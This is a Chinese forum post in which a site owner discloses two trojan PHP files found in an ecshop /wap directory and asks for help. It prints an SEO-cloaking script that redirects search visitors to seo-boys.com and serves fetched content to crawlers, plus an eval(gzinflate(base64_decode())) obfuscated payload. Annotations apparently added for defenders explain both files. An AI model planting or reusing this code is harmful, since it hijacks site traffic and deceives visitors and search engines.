wap目录挂马,劫持搜索引擎快照

2016-07-07 15:12 来源:www.chinab4c.com 作者:ecshop专家

发现两个木马脚本,/article.php 中引入了它们,结果我的文章快照全被劫持。
脚本内容如下:/wap/init.php
  1. <?php
     // Defender notes on this sample: a conditional SEO-hijack script. It treats
     // search-engine crawlers, visitors arriving from a search result, and all other
     // visitors differently, so someone browsing the site directly sees no change.
     // The outer guard runs the body only when gg() is not yet defined and $c is
     // loosely equal to ''; gg() is declared inside it, so a second include in the
     // same request is skipped.
     // gg($url): fetches $url with cURL and returns the response body. Only
     // CURLOPT_HEADER and CURLOPT_RETURNTRANSFER are set.
  2. if(! function_exists("gg") && $c=='' ){function gg($url){$ch = curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$contents = curl_exec($ch);return $contents;}if(!defined("myhost")){
     // myhost: a query string carrying this site's Host header and the requested URI;
     // it is later passed to gg() as the URL to fetch.
     // NOTE(review): as posted it has no scheme or host, so the listing may have been
     // altered before publication - confirm against the file on disk.
     // $tiaourl: the redirect destination used further down.
  3. define("myhost","?domain={$_SERVER['HTTP_HOST']}&i={$_SERVER['REQUEST_URI']}");} $tiaourl="http://www.seo-boys.com/jc/8g8.html";
     // $tjdaima: a third-party counter <script> tag that is emitted with the redirect.
  4. $tjdaima="<script language='javascript' src='http://count16.51yes.com/click.aspx?id=160664107&logo=12' charset='gb2312'></script>";
     // $wd: heredoc holding the keyword list, later split on newlines. The poster
     // replaced the real list with a note, so the keywords are not visible here.
  5. $wd = <<<FANRENGU
  6. 这其中是关键字列表,论坛不让发见:http://pan.baidu.com/share/link?shareid=480161&uk=1746266667
  7. FANRENGU;

     // Flow of the statement below:
     //  - $u is rebuilt from Host, port and REQUEST_URI; the URI is first filtered
     //    to a fixed character set by preg_replace.
     //  - $cks2 becomes true when the Referer contains a keyword from $wd, URL-encoded
     //    in either UTF-8 or GBK; the matched keyword is echoed.
     //  - $cks becomes true when the Referer contains baidu/google/soso/sogou, and is
     //    cleared again unless $cks2 is also true.
     //  - $ckp becomes true when the User-Agent contains one of the crawler names.
     //  - Neither $cks nor $ckp: nothing is emitted and the including page renders
     //    normally.
     //  - $cks: a JavaScript onload redirect and a meta refresh to $tiaourl are
     //    emitted together with $tjdaima, then the script exits.
     //  - Otherwise (crawler User-Agent): e() calls gg() on myhost, a() rewrites
     //    "?i=N" links in the fetched text so they point back at $u, the output
     //    buffer is discarded when the result is non-empty, and the fetched text is
     //    echoed before the request ends.
     // Triage notes: the post states that article.php includes this file, so that
     // include has to be removed too; deleting this file alone does not explain how
     // it was written to disk. Referer/User-Agent branching on crawler names and
     // outbound cURL from a page script are the traits to look for in other files.
  8. $h=$_SERVER['HTTP_HOST'];$p=$_SERVER['SERVER_PORT'];$p=($p=='80')?'':":{$p}";$wen=$_SERVER['REQUEST_URI'];$wen = preg_replace("~[^\w\-%\/&\.\?=]~isU","",$wen);$u="http://$h$p$wen";$cks2=false;$wd=str_replace(array("\r"),"",$wd);$wda=explode("\n",$wd);foreach($wda as $ww){$w1=trim($ww);if(strlen("徐")==3){$w2=mb_convert_encoding($w1,"gbk","utf-8");}else{$w2=mb_convert_encoding($w1,"utf-8","gbk");}$w11=urlencode($w1);$w22=urlencode($w2);if(stristr($_SERVER['HTTP_REFERER'],$w11)!='' || stristr($_SERVER['HTTP_REFERER'],$w22)!=''){echo $w1;$cks2=true;break;}}$ref=explode(',','baidu,google,soso,sogou');$cks=$ckp=false;$spider=explode(',','Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp');if($_SERVER['HTTP_REFERER']!=''){foreach($ref as $r){if(stristr($_SERVER['HTTP_REFERER'],$r)!=''){$cks=true;break;}}}foreach($spider as $s){if(stristr($_SERVER['HTTP_USER_AGENT'],$s)!=''){$ckp=true;break;}}if(!$cks2 && $cks){$cks=false;}if(!$cks && !$ckp){}else{if($cks){echo "<body onload=\"location.href='{$tiaourl}';\">{$tjdaima}<meta http-equiv='refresh' content='3; url={$tiaourl}'/></body>";exit;}$this_host = $_SERVER['HTTP_HOST'];function a($str){global $u,$wen;if($wen==''){$str=preg_replace("~\?i=(\d+?)~isU","{$u}?i=$1", $str);}else{$str=preg_replace("~\?i=(\d+?)~isU","{$u}&i=$1", $str);}$str=preg_replace("~(&?i=\d+?){2,}~isU","$1", $str);$str=preg_replace("~(\.php)&(i=\d+?)~isU","$1?$2", $str);$str=preg_replace("~\?&(i=\d+?)~isU","?$1", $str);return $str;}function e($u,$k){if ($k=="www.seo-boys.com/jt/8g8.html"){$files=gg($u);return $files;}else{return null;}}$c=e(myhost,'www.seo-boys.com/jt/8g8.html');$c=a($c);if($c!=''){ob_clean();}echo $c;flush();ob_flush();EXIT;}}?>
/wap/global.php
  1. <?php
  2. /*

  3. */
     // Defender notes on this sample: the statement below base64-decodes the string
     // literal, raw-inflates the result with gzinflate() and passes it to eval().
     // The decoded PHP is not shown on the page, so what it does cannot be stated
     // from this listing.
     // NOTE(review): decode the literal offline in an isolated environment, without
     // executing it, before drawing conclusions about its behaviour.
     // The eval(gzinflate(base64_decode(...))) chain is a common obfuscation wrapper
     // and a useful search pattern when sweeping the rest of the web root.
  4. eval(gzinflate(base64_decode('fZJPS8QwEMXPu7DfIZSFbUFbvbq7Fg9RTyK1ehEp3Xb6R9JOSFK6In53pxHdIqWXQF7eL29mmPB6F8pKrpaMrbtUsD1zKmPkVRD0fe/34nDUfoZN8J4FdZvD0Sezs2XWr/CAhoiLrb0+P/EoubnjDzFp2iiDAntQ7jqhhxcevW7u4/gxOdk2b54l68KFRpqP/86I3/KIR2TzPlfLBUX8yFCAAjWU2jr2g6/hAKFh2jaqpVMihwxzmMk6fUmFEStRu6Pmzhzq2vG8wTAawqXFZigt6xzUNLiY40Sn5DQ2QzWQ16lMlWlB6fMSsRQwn/0rkmrHDVmFrKgFJCWYJMPWQGsohbbkb0Qhbc83')));
  5. ?>
目前没有彻底解决隐患,不过其中连接有heishou的站点 大家heidiao丫的:www.seo-boys.com http://www.89899.com/

回答:
直接删除这些无用目录




像这种知道是什么漏洞所致吗?v7.2

要不你就换个空间,有次我也总被挂马,直接换服务器就OK了。